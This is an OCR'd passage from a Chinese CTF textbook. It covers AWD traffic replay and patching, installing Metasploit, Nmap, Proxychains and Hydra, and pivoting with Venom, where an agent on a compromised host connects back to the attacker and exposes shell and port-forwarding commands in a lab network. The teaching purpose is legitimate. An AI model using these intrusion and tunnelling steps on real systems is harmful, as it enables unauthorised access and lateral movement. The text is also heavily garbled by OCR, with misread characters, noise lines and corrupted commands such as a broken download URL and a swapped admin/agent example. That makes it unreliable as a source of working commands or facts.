路 : 如 果 目 己 被 设置 了 shell， 那 么 这 一 般 是 攻击 队伍 目 动 化 脚本 设置 的 ， 束 意味 着 其 他 非 攻 击 队 伍 
可 能 被 设置 了 ， 路 径 、 密 码 往 往 可 能 都 一 样 ， 所 以 可 以 进一步 利用 。 
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11.3 流量 分 析 
1. 流量 分 析 的 重要 性 


在 AWD 比 赛 中 ， 如 果 能 拿 到 题目 的 “一 血 ”， 人 往往 可 以 成 功 攻 击 全 场 ， 从 而 大 量 得 分 ， 迅 速 拉 开 = 
其 他 参赛 者 的 堵 距 。 而 如 果 其 他 参赛 者 率先 拿 天 了 题目 “一 血 ” 并 攻击 全 场 ， 这 时 快速 地 分 析 流 量 ， 
并 定位 漏洞 进行 修复 和 利用 重 放 融 很 重要 了 。 而 在 很 得 的 时 间 内 迅速 重 放流 量 ， 意 味 着 可 以 与 拿 到 
“一 血 ” 的 参赛 队伍 平分 其 他 参赛 队伍 的 失 分 ， 从 而 迅速 提高 分 数 。 


2. 流量 分 析 平 台 


这 里 推荐 的 流量 分 析 平 台 是 MaskRay 的 Pcap Search (https://github.com/MaskRay/pcap- 
sea 
) 。Pcap Search 平 人 台 采 用 先进 的 算法 和 数据 结构 对 流量 包 建 立夫 引 ， 以 实现 更 快 的 字符 串 匹 配 ， 
同时 支持 直接 导出 流量 的 字符 申 形 式 或 基于 zio 的 Python 重 放 脚 本 。 


有 选手 在 使 用 这 个 平台 后 ， 发 现 满足 不 了 某 些 比赛 的 个 人 需求 ， 于 是 有 的 将 基于 zio 的 重 放 脚 本 改 为 了 
在 现在 的 CTF 中 更 荣 用 的 基于 pwntools 的 重 放 脚 本 ， 有 的 为 了 方便 部 署 为 平台 编写 了 Dockerfile。 以 


上 提 到 的 修改 都 可 以 直接 在 Pcap Search 所 在 Github 仓 库 的 fork 列 表 中 找到 。 


当然 ， 如 果 需 要 更 多 的 功能 ， 如 定制 导出 的 重 放 脚 本 或 支持 正则 搜索 (为 了 更 快速 地 匹配 到 flag,， 上 
YE = [=D LE 4 = 
动 通过 SCP 或 HTTP 万 式 目 动 下 载 主办 方 提 供 的 流量 也 十 分 重要 。 


3. 如 何 快速 定位 有 效 攻击 流量 


5 动 3 :Ev 
方式 推荐 以 下 两 种 。 
@ 用 Pcap Search 直 接 对 flag 关 键 词 、flag 目 录 或 Web 题 中 的 菜刀 等 工具 连接 的 特征 进行 搜索 ， 导 出 


重 放 脚 本 进行 测试 。 但 有 经 验 的 攻击 者 往往 会 对 攻击 沪 量 进行 混淆 ， 从 而 避免 通过 这 毕 天 键 词 伞 搜索 
到 。 


@ 更 精确 的 方式 是 通过 对 流量 包 以 连接 为 单位 进行 拆 分 ， 在 本 地 运行 服务 模拟 题目 环境 ， 将 每 次 连接 
中 接收 的 内 容 发 送 给 本 地 服务 器 ， 判 断 本 地 服务 器 是 否 会 衣 演 (PWN 题 ) 或 者 是 否 能 直接 得 到 flag.。 
=: Eb 
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11.4 漏洞 修复 


AWD 的 本 质 是 让 参赛 者 拿 到 flag， 那 么 flag 的 菜 见 获取 方式 有 以 下 几 种 : 通过 RCE 漏 洞 ， 通 过 文件 读 
取 凋 洞 ， 通 过 SQL 注入 读 取 文 件 。 


如 何 修复 漏洞 便 成 了 问题 ， 这 里 笔者 只 简单 介绍 一 些 个 人 经 验 : 
他 在 保证 服务 正常 的 前 提 下 ， 设 置 一 些 关 键 词 waf， 如 load file 等 。 
科 对 于 一 些 成 型 的 CMS， 找 到 相应 版 本 号 ， 对 其 进行 diff。 
令 注意 后 台 的 弱 口 令 用 户 ， 这 往往 是 关键 。 


验 。 在 一 些 冤 得 危险 消 数 的 地 方 直 接 使 用 die() 消 数 。 
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小 结 


其 实 本 章 主要 针对 未 参加 过 AWD 比 赛 的 或 者 参赛 经 验 较 少 的 读者 ， 所 以 相对 比较 基础 ， 希 望 大 家 再 
解 。 最 后 说 两 点 笔者 参与 AWD 比 赛 的 感想 


1. 参赛 者 的 通 防 问题 


通 防 不 只 令 主办 方 头疼 ， 对 于 其 他 参赛 者 其 实 也 是 不 公平 的 ， 有 时 往往 化 费 精力 审 出 的 洞 ， 可 能 因为 

通 防 的 缘故 导致 不 能 利用 ， 而 通 防 的 时 间 精 力 成 本 基本 为 零 ， 所 以 导致 很 多 人 在 比赛 一 开始 的 时 候 丈 

会 布 上 通 防 。 当 灼 ， 目 前 主办 万 肘 check 机 制 也 在 不 断 元 亚 ， 相 信 有 一 天 会 出 现 一 个 可 玩 性 非常 高 的 、 
比赛 环境 。 


2. 比赛 突 必 情 况 


企 一 些 比赛 中 会 出 现 一 些 突 友 情况 ， 大 多 是 参赛 者 测试 主办 方 的 平台 安全 性 ， 导 致 了 一 些 意外 情况 ， 
如 参赛 者 可 以 任意 登录 其 他 参赛 者 的 账号 。 


这 里 建议 主办 方 一 定 提 前 测试 好 上 自身 平台 的 安全 性 ， 这 样 比赛 才能 够 保证 公平 公正 ; 同时 ， 和 希望 一 些 
参赛 者 在 测试 友 现 问题 时 能 够 主动 报告 主办 方 ， 而 不 是 利用 上 友 现 的 问题 进行 恶意 破坏 ， 降 低 比 赛 的 6 
玩 性 。 
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Ga 


在 CTF 线 下 赛 中 ， 靶 场 渗 透 出 现 的 频率 越 来 越 高 ， 也 越 来 越 多 样 化 ， 相 比 于 CTF 线 上 赛 ， 渗 透 方 向 的 
PN SSM/JeD a] me 3 NE 
的 漏洞 进行 收集 、 熟 练 地 运用 各 类 工具 和 一 个 具有 超 强 学 习 能 力 的 大 脑 。 本 章 将 从 如 何 搭建 顺手 的 渗 
透 环境 开始 ， 逐 步 讲 解 常见 漏洞 和 利用 、Windows 安 全 的 基础 知识 ， 结 合 CTF 比 赛 中 的 案例 ， 让 读者 
对 靶场 渗透 有 清楚 的 认识 。 
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12.1 打造 渗透 环境 


要 想 成 功 渗透 靶场 ， 不 可 能 仅 任 头脑 的 想象 完成 。 借 助 必 要 的 工具 ， 逐 步 攻破 ， 最 终 才能 完成 渗透 。 
本 节 将 介绍 渗透 过 程 中 常用 的 软件 ， 以 及 渗透 环境 的 配置 和 使 用 。 


12.1.1 Linux 下 Metasploit 的 安装 和 使 用 


Metasploit 是 一 蒜 开 源 的 安全 漏洞 检测 工具 和 渗透 测试 框架 ,常用 来 检测 系统 的 安全 性 ， 灵 活 可 扩展 
的 以 构 ( 见 图 12-1-1) 将 多 种 模块 整合 在 一 起 ， 集成 各 种 平台 此 见 的 漏洞 利用 和 流行 的 co。 
， 并 保持 频繁 更 新 。 而 且 ， 由 Ruby 语 言 开发 的 模板 化 框架 具有 很 强 的 扩展 性 ， 让 使 用 者 可 以 低 门 朴 
的 开发 、 定 制 自己 的 漏洞 利用 脚本 ， 提 高 渗透 效率 。 


Metasploit 由 多 个 模块 构成 ， 各 模块 的 名 称 作用 如 下 。 


入 Auxiliary (辅助 模块 ) : 负责 执行 扫描 、 嗅 探 、 指 纹 识别 、 信 息 收集 等 相关 功能 来 辅助 渗 


、, 


叙 Exploits (漏洞 利用 ) : 支持 攻击 者 利用 系统 、 应 用 或 者 服务 中 的 安全 漏洞 进行 攻击 ， 包 括 
攻击 者 或 安全 研究 员 针 对 系统 中 的 漏洞 设计 开发 的 用 于 破坏 系统 安全 性 的 代码 。 


信 Payloads (攻击 载 答 模块 ) : 支持 攻击 者 在 目标 系统 执行 完成 漏洞 利用 后 实现 实际 攻击 功 
能 的 代码 ， 用 于 执行 任意 命令 或 执行 特定 代码 。 


入 Post-Exp (后 渗透 模块 ) : 用 于 取得 目标 控制 权 后 ， 进 行 系列 的 后 渗透 攻击 行为 ， 如 获取 
敏感 信息 、 权 限 提升 、 后 门 持久 化 等 。 


他 Encoders (编码 器 模块 ) : 用 于 规避 杀毒 软件 、 防 火 墙 等 防护 。 


Metasploit 有 几 种 安装 方式 : 系统 镜像 源 安装 ，GitHub 源 码 安装 ， 官 方 脚本 安装 。 这 三 种 安装 方式 
各 有 优 劣 ， 系 统 镜 像 源 安装 的 优点 是 不 用 自己 配置 依赖 安装 即 用 ， 但 是 存在 更 新 不 及 时 、 漏 洞 利用 不 
是 最 新 的 等 缺点 ; 源码 安装 使 用 的 是 Dev 分 支 的 代码 ， 漏 洞 利用 保持 最 新 ， 缺 点 是 需要 手动 安装 依赖 
和 数据 库 难 度 比 较 大 ， 不 推荐 新 手 使 用 ; 而 Metasploit 官 方 源 刚好 弥补 前 两 种 安 委 方 式 的 不 足 ， 所 以 
这 里 推荐 使 用 官方 源 脚本 在 Ubuntu 上 进行 安装 。 
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先 在 Ubuntu 中 打开 终端 ， 输 入 如 下 命令 : 


EEC 


sudo apt instaLL curl && curl https://ram.githubusercontent.com/rapid7/metaspLoit- omnibus/ 
master/config/templates/metasploit-framework-wrappers/msfupdate.erb> msfinstall && chmod 755 
msfinstall && ./msfinstall er 


再 输入 密码 ， 见 图 12-1-2。 


| 


图 12-1-2 
安装 结束 后 ， 输 入 “msfconsole” 命 令 ， 会 提示 是 否 建 立 一 个 新 数据 库 ， 输 入 “yes” 后 ， 会 进行 数 
据 库 的 初始 化 ， 见 图 12-1-3。 


在 实际 使 用 Metasploit 过 程 中 需要 综合 使 用 前 面 介绍 的 模块 ， 一 般 对 目标 发 起 攻击 的 主要 的 流程 有 : 
扫描 目标 系统 ， 寻 找 可 用 漏洞 ;选择 并 配置 漏洞 利用 模块 ;选择 并 配置 对 应 目标 系统 的 攻击 载 傈 模 
块 ; 执行 攻击 。 





图 12-1-3 
信息 收集 是 渗透 测试 中 的 第 一 步 ， 也 是 最 重要 的 一 步 ， 还 是 贯穿 整个 渗透 流程 的 一 步 ， 其 主要 目的 是 
尽 可 能 多 得 发 现 与 目标 有 关 的 信息 。 当 然 ， 收 集 的 信息 越 多 ， 渗 透 成 功 的 几率 就 越 高。 下 面 将 介绍 如 
何 使 用 辅助 模块 进行 端口 扫描 。 


使 用 辅助 模块 进行 端口 扫描 ， 扫 描 完成 后 的 结果 可 以 让 我 们 得 知 目标 开放 的 端口 ， 然 后 根据 相应 端口 
进行 服务 判断 ， 才 可 以 进行 下 一 步 的 利用 。 


先 使 用 search 命 令 搜索 有 哪些 可 用 的 章 口 扫 摘 模块 ， 见 图 12-1-4， 列 出 了 可 用 的 扫 摘 器 列表 包含 的 扫 








图 12-1-4 
下 面 以 TCP 扫 摘 模 块 为 例 。 用 use 什 令 连 接 模 块 ， 用 show options 命 令 查 看 需要 设置 的 参数 ， 图 
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图 12-1-5 
set 命 令 用 于 填 入 需要 设置 的 参数 的 值 ，unset 命 令 用 于 取消 某 个 参数 的 值 。setg 和 unsetg 命 令 则 用 
于 设置 全 局 或 者 取消 全 局 参数 的 值 。 通 过 参数 的 描述 可 以 设置 待 扫描 的 目标 地 址 、 端 口 和 线程 数 ， 见 
Sa Rh 









































图 12-1-6 
在 扫 摘 目标 运行 的 服务 时 ， 有 很 多 基于 服务 的 扫 摘 模块 可 以 选择 ， 只 需 搜索 scanner， 融 可 以 上 友 现 大 
量 的 扫 摘 模块 。 建 议 读 者 尝试 不 同 的 扫 摘 模块 ， 了 解 其 用 法 和 功能 。 它 们 的 使 用 方法 大 致 相同 ， 见 图 
12-1-7。 









































图 12-1-7 
使 用 portscan 模 块 探测 的 结果 不 能 准确 地 判断 目标 运行 的 服务 ， 所 以 在 Metasploit 中 同样 可 以 使 用 
扫描 。Nmap 的 安装 和 用 法 将 在 12.1.2 节 中 介绍 。 实 际 使 用 时 ， 在 msfconsole 中 输入 “nmap” 
命令 即 可 使 用 ( 需 提前 安装 ) ， 见 图 12-1-8。 
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a 下 相信 Ude 


图 12-1-8 


另外 ， 每 个 操作 系统 或 者 应 用 一 般 会 存在 各 种 漏洞 ， 虽 然 开 发 商会 快速 地 针对 它们 开发 补丁 ， 并 为 用 
户 提供 更 新 ， 但 因为 各 种 各 样 的 原因 ， 用 户 往往 不 会 及 时 进行 更 新 ， 这 也 残 导 致 了 0day 在 很 长 时 间 后 
变 成 Nday 还 能 继续 被 利用 。12.3 节 将 结合 几 个 常见 而 有 效 的 系统 漏洞 利用 Metasploit 进 行 讲解 分 
析 ， 让 大 家 对 这 个 内 网 渗透 利器 有 更 深 的 了 解 。 


12.1.2 Linux 下 Nmap 的 安装 和 使 用 
Nmap (Network Mapper) 是 一 款 功 能 强大 、 界 面 简单 清晰 的 端口 扫描 软件 ， 能 够 轻松 扫描 相应 
的 端口 服务 ， 并 推测 出 目标 相应 的 操作 系统 和 版 本 ， 从 而 帮助 渗透 人 员 快 速 地 评估 网 络 系统 安全 。 


NE Io: DEE 3 > 0 =E YE ES 
9。 


图 12-=1-9 
上 述 方式 安 妆 的 Nmap 往 往 不 是 最 新 版 本 ， 如 果 想 获取 最 新 版 本 ， 可 以 采用 源码 编译 ， 参 考 http:// 


LE 
.org/boolwWinst-source.htm|。 


安装 成 功 后， 在 终端 输入 “nmap” 命 令 ， 会 输出 一 些 参数 ， 见 图 12-1-10。 





图 12-1-10 
Nmap 的 基本 使 用 方法 如 下 ， 其 中 有 些 参数 可 以 组 合 。 


(1) 基础 扫 拉 命令: nmap 192.168.1.1 


Nmap 默 认 会 使 用 TCP SYN 扫 描 使 用 率 排 名 前 1000 的 端口 ， 并 将 结果 (open、closed、filtered) 返 
回 给 用 户 ， 见 图 12-1-11。 
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图 12-1-11 


(2) 主机 友 现 命令 : nmap-sP-n 192.168.1.2/24-T5--open 


Nmap 会 以 最 快速 度 (参数 为 “-T5”) 使 用 ping 扫 描 (参数 为 “-sP”) 并 不 反 向 解析 (参数 为 “- 
n”) ， 将 存活 的 主机 中 返回 (参数 为 “--open”) 给 用 户 ， 见 图 12-1-12。 


图 12-=1-12 


(3) 资产 扫描 命令 : nmap-sS-A--version-all 192.168.1.2/24-T4--open 


Nmap 会 使 用 TCP SYN 扫 描 (参数 为 “-sS”) ， 使 用 略 高 于 默认 的 速度 (参数 为 “-T4”) ， 将 开放 
的 服务 、 系 统 信 息 (参数 为 “-A”) 和 服务 详情 (精准 识别 ,参数 为 “--version-all”) 返回 (参数 
为 “--open”) 给 用 户 。 注 意 ， 这 样 往往 会 花费 大 量 的 时 间 。 


(4) 闯 口 扫 摘 命令 : nmap-sT-p80，443，8080 192.168.1.2/24--open 


Nmap 会 使 用 ping 扫 描 (参数 为 “-sT”) ， 将 指定 的 端口 (参数 为 “-p”) 中 开放 的 端口 (参数 为 
“--open”) 返回 给 用 户 ， 见 图 12-1-13。 


图 12-1-13 


12.1.3 Linux 下 Proxychains 的 安装 和 使 用 


Proxychains 是 一 款 Linux 代 理工 具 ， 可 以 使 任意 程序 通过 代理 连接 网 络 ， 人 允许 TCP 和 DNS 通过 代理 隧 
道 ， 支 持 HTTP、Socks4、Socks5 类 型 的 代理 服务 器 ， 并 且 支 持 配 置 多 个 人 代理。 注意 ，Proxychains 
只 会 将 指定 的 应 用 的 TCP 连 接 转发 至 代理 ， 而 非 全 局 代理 。 这 里 推荐 使 用 proxychains-ng， 在 终端 中 
输入 以 下 命令 : 


Ed a EE 


apt-get install -y build-essential gcc g++ git automake make 
git clone https://github.com/roflOr/proxychains-ng.git 
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cd proxychains-ng 
./configure --prefix=/usr/local/ 
make && make install 
cp ./src/proxychains.conf /etc/proxychains.conf 


构建 编译 环境 ， 见 图 12-1-14 和 图 12-1-15。 


然后 在 编辑 配置 文件 的 代理 列表 中 添加 代理 ， 终 尊 中 输入 如 下 命令 并 修改 : 


sudo vi /etc/proxychains.conf °° Ey 


结果 见 图 12-1-16。 
使 用 万 法 为 : 
prooemainmhsse 


例如 ， 使 用 Socks5 代 理 打 开 Firefox : 


pToxychains4 firefox 


如 果 想 直接 使 用 proxychains4 代 理 Metasploit， 可 以 在 配置 文件 中 修改 或 添加 本 地 白 名 单 “localnet 
127.0.0.0/255.0.0.0”， 然 后 执行 “proxychains4 msfconsole” 即 可 。 


注意 ，Metasploit 中 的 某 些 模块 不 会 通过 这 种 方式 代理 ， 需 要 通过 设置 proxies 参 数 来 指定 代理 。 


图 12-1-14 


A ls 
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图 12-1-16 


12.1.4 Linux 下 Hydra 的 安 六 和 使 用 
Hydra 是 THC 开 发 的 一 款 开源 的 密码 爆破 工具 ， 功 能 强大 ， 支 持 下 述 多 种 协议 的 破解 : 


adam6500 asterisk cisco cisco-enable cvs ftp ftps http[s]-{head|get|post} http[s]-{get|post}- 
form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssqtL 
mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis 
rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey teamspeak 
telnet[s] vmauthd vnc xmpp 


在 Ubuntu 上 的 安 委 命 令 如 下 ， 见 图 12-1-17。 


sudo apt-get instaLL LibssL-dev libssh-dev libidnll-dev Libpcre3-dev libgtk2.0-dev 
libmysqlclient-dev libpq-dev libsvn-dev 

firebird-dev libmemcached-dev libgpg-error-dev 

libgcryptll-dev libgcrypt20-dev 

git clone https://github.com/vanhauser-thc/thc-hydra 


图 12-1-17 
输入 “hydra” ， 默 认输 出 help 参 数 的 内 容 ， 见 图 12-1-18。 


具体 使 用 方法 读者 可 以 本 地 自行 搭建 党 试 。 


12.1.5 Windows 下 PentestBox 的 安装 


PentestBox 是 Windows 操 作 系统 的 开源 软件 ， 类 比 于 Kali， 可 以 用 于 渗透 测试 环境 ， 其 内 置 常 见 的 
安全 工具 。 目 前 ， 其 官网 (https://pentestbox.org/zh/) 有 两 种 版 本 ， 一 种 没有 Metasploit， 一 
种 包含 Metasploit， 见 图 12-1-19， 直 接 下 载运 行 安装 即 可 。 


12.1.6 Windows 下 Proxifier 的 安装 


Proxifier 是 一 蒜 功 能 非常 强大 的 Socks5 客 尸 端 ， 可 以 让 不 支持 代理 的 网 络 程序 强制 通过 代理 服务 器 
访问 网 络 ， 支 持 多 种 操作 系统 平台 和 多 种 代理 协议 ,程序 界 面 风 图 12-1-20。 具 体 使 用 方法 在 此 不 由 


Select Download options from right 


There are two variants of PentestBox one without Metasploit and other one with Metasploit. PentestBox 

Antiviruses and Firewalls needs to be switched off to install and operate the version with 

Metasploit 

Download any of the variant by clicking respective download button present on the right side. 

By default installer extract to C:/PentestBox/, and for its proper functioning do not make any PentestBox with Metasploit 


changes. 

Now refer to tools pentestbox. org and docs pentestbox. org to know about the usage of tools. 
if you face any problems or have any questions, please check faq pentestbox org or post your 
issue on forum .pentestbox org. Connect with us on Facebook or Twitter to get updates about 
PentestBox . 

Found this project interesting! There are many ways you can contribute, check 
docs.pentestbox.org/contributing 


Please do not download PentestBox from any source other than link 
given above. 


图 12-1-19 
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图 12-1-18 





| Welcome to Proxifier v3.0 
[05.04 20:21:05] OUTLOOK EXE -mail example net-995 open through proxy 192.168.1.1:1080 SOCKS5 





Ad 
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12.2 痛 口 转 友 和 代理 


在 靶场 渗透 过 程 中 ， 知 在 目标 网 络 成 功 建立 了 立足 点 ， 就 可 以 以 本 地 的 方式 访问 目标 内 部 网 络 中 的 开 
放 的 服务 端口 来 进行 横向 移动 ， 如 445、3389、22 端 口 等 ， 所 以 需要 灵活 使 用 端口 转发 和 代理 技术 。 


sm EE 3 /A 
口 ， 客 户 端 主动 访问 。 被 动 模式 是 客户 端 先 监听 端口 ， 再 等 待 服务 器 连接 。 因 为 网 络 限制 问题 ， 所 以 
需要 提前 做 好 选择 。 


一 般 ， 服 务 器 防火 墙 对 进入 的 流量 有 较 严 格 的 限制 ， 但 是 对 出 去 的 流量 相对 没有 那么 严格 ， 所 以 我 们 
经 常 选择 被 动 模式 ， 但 需要 一 个 公 网 IP 的 资源 ， 这 样 才能 让 服务 器 连接 到 ]。 


下 面 以 模拟 实验 的 形式 构建 一 个 环境 ， 拥 有 多 级 路 由 ， 并 且 下 层 路 由 无 法 访问 外 部 网 络 ， 见 图 12-2- 
1。 这 里 使 用 VMware 的 虚拟 网 卡 构建 LAN。 虚 拟 机 镜像 分 别 为 Kali 一 台 ，Windows Server 2012 两 
台 。Kali 作 为 外 网 机 器 ， 一 台 Windows 主 机 承担 端口 转发 功能 ， 另 一 台 则 需要 作为 被 转发 服务 的 目 


[8 


192.168.40.145 192.168.115.128 
192.168.40.147 


|: 


192.168.115.129 


192.168.115.0/24 
图 12-2-1 


选择 Kali， 在 “虚拟 机 设置 ”对 话 框 中 选择 “NAT” 网 络 模式 ,分配 IP 为 “192.168.40.145”， 见 
图 12-2-2。 读 者 分 配 到 的 IP 可 能 不 同 ， 这 并 不 影响 实验 。 


“| “明年 W 带 
ln i 
Esl i 


同 计 二 本 
(局 醒 坦 芝 1 看 硬 法 二 物理 引 辣 
Er ll 
岂 BT 眉 或 i 加 于 反 吉 主 由 的 语 境 击 
站 已 主 山 慎 臣 {NF 合计 山特 麻吉 而 二 同 闭 
直面 宣 文 IE 特 宝 起 回忆 车 
Wheat 
IM 区 局 和 和 
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现在 添加 一 张 虚 拟 网 卡 ， 在 VMware 中 选择 “编辑 一 虚拟 网 络 编辑 器 ”菜单 命令 ( 见 图 12-2-3) ， 添 
加 一 张 网 卡 ， 并 设置 为 “ 仅 主 机 模式 ”; “ 子 网 地 址 ”任意 设置 ， 如 192.168.115.0，“DHCP” 设置 
为 “已 启用 ”， 见 图 12-2-4。 


文件 (F | 编 句 (E) ”查看 (V) ”应 拟 UM) ”选项 卡 (T) 帮助 (H) 
库 葛 切 T) Ctr|+X 
复制 (C) Ctrl+C 
Ctrl+V 


Ctrl+P 


图 12-2-3 


类 型 外 部 连接 
桥接 模式 Killer E2200 Gigabit Ethernet,.， - 本 
仅 主机 ,.， - ) 192.168. 180.0 


i 192.168.116.0 
NAT 模式 NAT 模式 192.168.40.0 


〇 桥接 模式 (将 虚拟 机 直接 连接 到 外 部 网 络 )G) 
桥接 有 QD): dller Gigabit Ethernet Controller 

〇 NAT 模式 (与 虚拟 机 共享 主机 的 也 地 址 ) 

圈 公主 机 模式 (在 专用 网 络 内 连接 虚拟 机 )(H 

回 将 主机 虚拟 适配器 连接 到 此 网 络 W 
主机 虚拟 适配器 名 称 : VMware 网 络 适配器 VMnet2 

回 使 用 本 地 DHCP 服务 将 IP 地 址 分 配给 虚拟 机 四 ) 


了 网 P@: [192 .168 .115 . 0 ] 。 子 网 搞 码 M: [255 .255 .255 .0 | 
还 原 默 认 设置 @) 7 
图 12-2-4 
为 了 模拟 内 网 环境 ， 将 两 台 Windows server 2012 虚 拟 机 的 网 卡 都 设置 为 YMnet2， 并 在 其 中 一 台 主 


机 上 新 增 一 张 NAT 模 式 的 虚拟 网 卡 ， 使 其 能 够 与 外 部 网 络 进行 交互 。 其 中 一 台 Windows 主 机 的 两 个 
网 卡 设置 见 图 12-2-5。 


设备 状态 
回 已 连接 (5) 


回 启动 时 连接 (D) 
已 硬盘 (SCSI) 


© CD/DVD (SATA) E 网 络 信 接 
〇 桥接 模式 (B): 直接 连接 物理 网 络 
复制 物理 网 络 连 接 状 态 (p) 
CO 〇 NAT 模式 (N): 用 于 共享 主机 的 人 P 地 址 
〇 保 主 机 模式 (H): 与 主机 共享 的 专用 网 络 
@®@ 自 定义 (U): 特定 虚拟 网 络 
VMnet2 ( 仅 主机 模式 ) 
OLAN 区 上段 (L): 


图 12-2-5 
另 一 台 设 置 为 单 网 卡 ，VMnet， 见 图 12-2-6。 然 后 关闭 两 台 Windows 的 防火 墙 。 


| “设备 状态 

2 GB | ” 回 已 连接 (G) 

1 电扇 :加 连接 (0) 

60 GB 
© CD/DVD (SATA) 自动 检测 | “网 络 连 接 
〇 桥接 模式 (B): 直接 连接 物理 网 络 
< - Se 
da 志 上 | 复制 物理 网 络 连 接 状 态 (P) 
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ONAT 模式 (N): 用 于 共享 主机 的 芳 地 址 
O 〇 仅 主 机 模式 (H): 与 主机 共享 的 专用 网 络 
@ 自 定义 (U): 特定 虚拟 网 络 


OLAN 区 段 (L): 


CY 


方太 |] 
图 12-2-6 
全 此 ， 基 本 环境 设置 完成 ， 后 面 将 使 用 以 上 环境 进行 实验 。 


12.2.1 闯 口 转 友 


在 靶场 渗透 比赛 中 常常 会 遇 到 较为 复杂 的 网 络 环境 ， 而 为 了 能 够 在 任何 场景 下 都 能 畅通 无 阻 ， 参 赛 选 
ER = EE3 
发 ， 只 有 通过 转发 ， 才 能 将 多 级 路 由 之 后 的 那些 无 法 直接 访问 到 的 端口 设置 在 自己 能 触及 的 主机 上 。 


能 够 进行 端口 转发 的 工具 种 类 较 多 ,如 SSH、Lcx、Netsh、Socat、Earthworm、Frp、Ngrok、 me 

、Venom 等 。 其 中 ，Earthworm、Termite、Venom 为 同一 类 工具 ， 其 特点 是 以 节点 的 方式 管 
理 多 台 主 机 ， 并 文 持 跨 平台 ， 可 以 快速 构建 代理 链 ， 如 果 熟 练 使 用 ， 在 渗透 中 可 以 极 大 的 节省 时 间 。 
Earthworm 和 termite 出 于 同一 作者 ， 它 们 也 是 国内 渗透 测试 中 用 的 最 多 的 工具 ， 但 由 于 某 些 原因 ， 
其 作者 下 架 了 这 两 种 工具 ， 无 法 从 官方 渠道 下 载 。 


这 里 主要 介绍 Venom 和 sqsH。 
1. venom 


Venom 是 一 款 为 渗透 测试 人 员 设 计 的 使 用 Go 语言 开发 的 多 级 代理 工具 ， 可 将 多 个 节点 进行 连接 ， 然 
后 以 节点 为 跳板 ， 构 建 多 级 代理 。 渗 透 测试 人 员 可 以 使 用 Venom 轻 松 地 将 网 络 流量 代理 到 多 层 内 网 ， 
并 轻松 地 管理 代理 节点 。 


Venom 分 为 两 部 分 : admin 管 理 端 和 agent 节 点 段 ， 核 心 操 作为 监听 和 连接 。admin 节 点 和 agent 节 


点 均 可 监听 连接 也 可 发 起 连接 (。 引 自 Github 官 人 
e 
Se 


no 


命令 范例 如 下 。 


(1) 以 管理 端 作为 服务 端 


# 管理 端 监听 本 地 9999 端口 
./admin_macos_x6! -Lport 9999 


# 节点 端 连接 服务 端 地址 的 端口 
./agent_linux_x64 -rhost 192.168.0.103 -rport 9999 


(2) 以 节点 端 作为 服务 端 


# 节点 端 监听 本 地 9999 端口 
./agent_Linux_x64 -Lport 8888 


# 管理 端 连接 服务 端 地 址 的 端口 
./agent_Linux_x64 -rhost 192.168.0.103 -rport 9999 


获取 到 节点 后 ， 可 以 使 用 goto 命 令 进 入 该 节操 ， 并 在 该 节点 上 进行 如 下 操作 ， 包 括 : 
们 Listen， 在 目标 节点 上 监听 端口 ; 


学 Connect， 让 目标 节点 连接 指定 服务 ; 


-WE dd i 
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今 Shell， 局 动 一 个 交互 式 的 shell; 

[0] [ol:To PM mw =D 6 DL [ok:To Pl VEDA 
叙 Lforward， 本 地 的 端口 转发 ; 

令 Rforward， 远 程 端 口 转发 。 


接 下 来 使 用 模拟 环境 进行 实 操 。 首 先 下 载 venom 的 预 编译 文件 : Bp/ GID om/ 3/ 


eno 
/releases/download/v1.0.2/Venom.v1.0.2.7z。 


目录 结构 如 下 : 


入 tree /F 
文件 夹 PATH 列表 
卷 序列 号 为 8C86-787E 
GC: 
| .DS_Store 
| admin.exe 
| admin_Linux_x64 
| admin_Linux_x86 
| admin_macos_x64 
| agent.exe 
| agent_arm_eabi5 
| agent_linux_x64 
| agent_linux_x86 
| agent_macos_x64 
| agent_mipsel_versionl 
| 


[一 Scripts 
port_reuse.py 


假设 已 成 功 拿 下 第 一 台 机 器 后 ， 将 编译 好 的 文件 上 传 到 目标 主机 上 ， 而 后 局 动 服务 端 ， 如 果 目 标 无 可 


直 授 访问 的 公 网 地 址 或 者 存在 防火 墙 ， 那 么 将 无 法 直接 访问 目标 并口， 需要 建立 反 向 连接 ， 也 束 是 ee 
elelaalla 
疹 作 为 服务 痕 监 听 痕 口 ， 而 agent 节 点 问 进 行 主 动 连接 ， 这 样 惑 可 以 绕 过 防火 墙 等 限制 ， 操 作 如 
本 区， 


在 服务 端 上 开启 监听 8888 端 口 ， 见 图 12-2-7。 


./admin_Linux_x64 -Lport 8888 


图 12-2-7 
接 下 来 在 跳板 机 上 运行 agent 节 点 端 连接 服务 端 ， 见 图 12-2-8，。 


agent .exe -rhost 192.168.40.145 -rport 8888 
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图 12-2-8 
Ee [TTT GED ESE DA US 


下 面 主 要 讲解 其 中 端口 转 友 的 使 用 ， 存 在 两 个 端口 转 友 的 功能 ,分别 为 : 本 地 端口 转 友 和 远程 端口 转 
及。 

















图 12-=2-9 


本 地 闯 口 转 友 融 是 将 本 地 (admin 节 点) 的 端口 转 友 到 目标 忆 点 的 端口 上 。 例 如 ， 将 本 地 端口 为 80 的 
Web 服 务 转 友 到 目标 节点 的 80 端 口上 ， 命 令 为 : 


UEDARORORTLESGESG 


然后 在 目标 节点 的 80 并 口上 束 可 以 访问 该 Web 服 务 了 ， 见 图 12-2-10。 





12-2-10 
远程 端口 转发 是 将 远程 节点 的 端口 转发 到 本 地 端口 上 。 例 如 ， 将 前 面目 标 节点 打开 的 80 端 口 再 转发 到 
admin 节 点 的 8080 端 口 ， 命 令 为 : 


rforward 192.168.40.147 80 8980 


访问 本 地 的 8080 痛 口 即 可 访问 目标 节点 的 80 痛 口 ， 见 图 12-2-11。 
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图 12-2-11 
当然 ， 也 可 以 将 内 网 其 他 机 器 的 端口 转发 出 来 ， 如 对 于 无 法 直接 访问 到 的 192.168.115.129， 现 在 将 
其 smb 端 口 转发 到 本 地 的 445 端 口 ， 命 令 为 : 


rforward 192.168.115.129 445 ud5 | 


随后 便 可 以 在 本 地 的 445 端 口 访问 到 来 自 192.168.115.129 的 smb 服 务 ， 见 图 12-2-12。 





图 12-2-12 
PN 


SSH 的 喘 口 转发 在 一 些 场景 下 十 分 便捷 稳定 ， 具 体 的 操作 方式 如 下 ， 读 者 可 目 行 在 本 地 进行 测试 。 


